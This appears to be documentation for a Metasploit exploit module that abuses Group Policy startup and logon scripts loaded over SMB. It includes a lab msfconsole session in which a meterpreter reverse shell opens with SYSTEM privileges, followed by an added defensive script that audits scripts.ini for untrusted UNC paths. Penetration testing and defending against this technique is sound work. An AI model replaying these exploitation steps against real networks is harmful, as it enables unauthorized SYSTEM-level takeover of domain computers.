## Vulnerable Application

This is a general-purpose module for exploiting systems where Windows Group Policy is configured to load VBS startup/logon scripts from remote locations.
The module runs an SMB share that serves a payload inside a VBS file. Startup scripts are executed with SYSTEM privileges,
while logon scripts are executed with the privileges of the user logging on. The attacker still needs to redirect the target's traffic to the fake SMB
share to exploit it successfully.

Note that in some cases it can take 5 to 10 minutes to receive a session.

More information is available at [Gotham Digital Science Security](https://blog.gdssecurity.com/labs/2015/1/26/badsamba-exploiting-windows-startup-scripts-using-a-maliciou.html).

## Verification Steps

  1. Start msfconsole
  2. Do: ```use modules/exploits/windows/smb/group_policy_startup```
  3. Do: ```exploit```

## Options

  **FILE_NAME**

  VBS File name to share (Default: random .vbs)

  **FOLDER_NAME**

  Folder name to share (Default: none)

  **SHARE**

  Share name (Default: Random)

## Scenarios

### Domain Group Policy

In this scenario, the following computers are present:

1. Windows 7 (x64, Build 7601, SP1): Victim
2. Server 2016 (x64, Version 1607, OS Build 14393.970): Domain Controller

The module sets up the SMB share and the VBScript file. Out of band (outside the scope of this module and its documentation), a Group Policy is applied to the `OU` computer container.
Next, the Windows 7 machine fetches the payload on boot, in this case the meterpreter reverse_tcp stager, and runs it with `SYSTEM` privileges because it is executed as a startup script.
Theoretically, any other computer in that `OU` would also execute the script on startup.

  ```
  msf > use modules/exploits/windows/smb/group_policy_startup
  msf exploit(windows/smb/group_policy_startup) > set FILE_NAME startup.vbs
    FILE_NAME => startup.vbs
  msf exploit(windows/smb/group_policy_startup) > set SHARE scripts
    SHARE => scripts
  msf exploit(windows/smb/group_policy_startup) > exploit
    [*] Exploit running as background job 0.
    [*] Exploit completed, but no session was created.

    [*] Started reverse TCP handler on 192.168.1.3:4444
    [*] File available on \\192.168.1.3\scripts\startup.vbs...
    [*] Started service listener on 192.168.1.3:445
    [*] Server started.
    [*] Sending stage (180291 bytes) to 192.168.1.4
    [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.4:49178) at 2019-12-04 13:12:05 -0700
  msf exploit(windows/smb/group_policy_startup) > sessions 1
    [*] Starting interaction with 1...

  meterpreter > sysinfo
    Computer        : MSF-PC
    OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
    Architecture    : x64
    System Language : en_US
    Domain          : MSF
    Logged On Users : 1
    Meterpreter     : x86/windows
  meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM
  ```
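
A defender-side check for the condition this module depends on, as an added example that is not part of the Metasploit module or its documentation: it parses a GPO `scripts.ini` and reports startup/logon scripts referenced by UNC path on hosts outside an allowlist. The `scripts.ini` layout (`[Startup]`/`[Logon]` sections, `NCmdLine=` keys, UTF-16LE encoding) is assumed from standard Group Policy behaviour, and the host names, paths and function names are constructed for illustration.

```python
import re

SECTION_RE = re.compile(r"^\[(\w+)\]$")
CMDLINE_RE = re.compile(r"^\d+CmdLine=(.*)$", re.IGNORECASE)
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")
# Startup/Shutdown scripts run as SYSTEM, Logon/Logoff scripts as the user.
RUNS_AS = {"startup": "SYSTEM", "shutdown": "SYSTEM", "logon": "user", "logoff": "user"}

# Constructed sample; host names and paths are made up for this example.
SAMPLE_TEXT = r"""[Startup]
0CmdLine=\\fileserver01\scripts\startup.vbs
0Parameters=
1CmdLine=\\dc01.msf.example\SYSVOL\msf.example\scripts\inventory.vbs
1Parameters=
[Logon]
0CmdLine=\\10.0.0.25\share\logon.vbs
0Parameters=
1CmdLine=map_drives.vbs
1Parameters=
"""
SAMPLE_RAW = b"\xff\xfe" + SAMPLE_TEXT.encode("utf-16-le")  # BOM + UTF-16LE (assumed)

def decode_scripts_ini(raw):
    """Decode scripts.ini bytes: UTF-16 when a BOM is present, else UTF-8."""
    if raw.startswith(b"\xff\xfe"):
        return raw.decode("utf-16")
    return raw.decode("utf-8", errors="replace")

def audit_scripts_ini(text, trusted_hosts):
    """Return one finding per script whose UNC host is not in trusted_hosts.

    Relative and local paths are skipped; only remote (UNC) references count.
    """
    trusted = {h.lower() for h in trusted_hosts}
    findings, section = [], None
    for line in text.splitlines():
        line = line.strip()
        if m := SECTION_RE.match(line):
            section = m.group(1)
        elif section and (m := CMDLINE_RE.match(line)):
            path = m.group(1).strip().strip('"')
            unc = UNC_RE.match(path)
            if unc and unc.group(1).lower() not in trusted:
                findings.append({"section": section, "host": unc.group(1), "path": path,
                                 "runs_as": RUNS_AS.get(section.lower(), "unknown")})
    return findings

if __name__ == "__main__":
    print(audit_scripts_ini(decode_scripts_ini(SAMPLE_RAW), {"dc01.msf.example"}))
```

Entries reported under `Startup` are the higher-priority findings, since those scripts run as `SYSTEM` on every computer the policy applies to.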
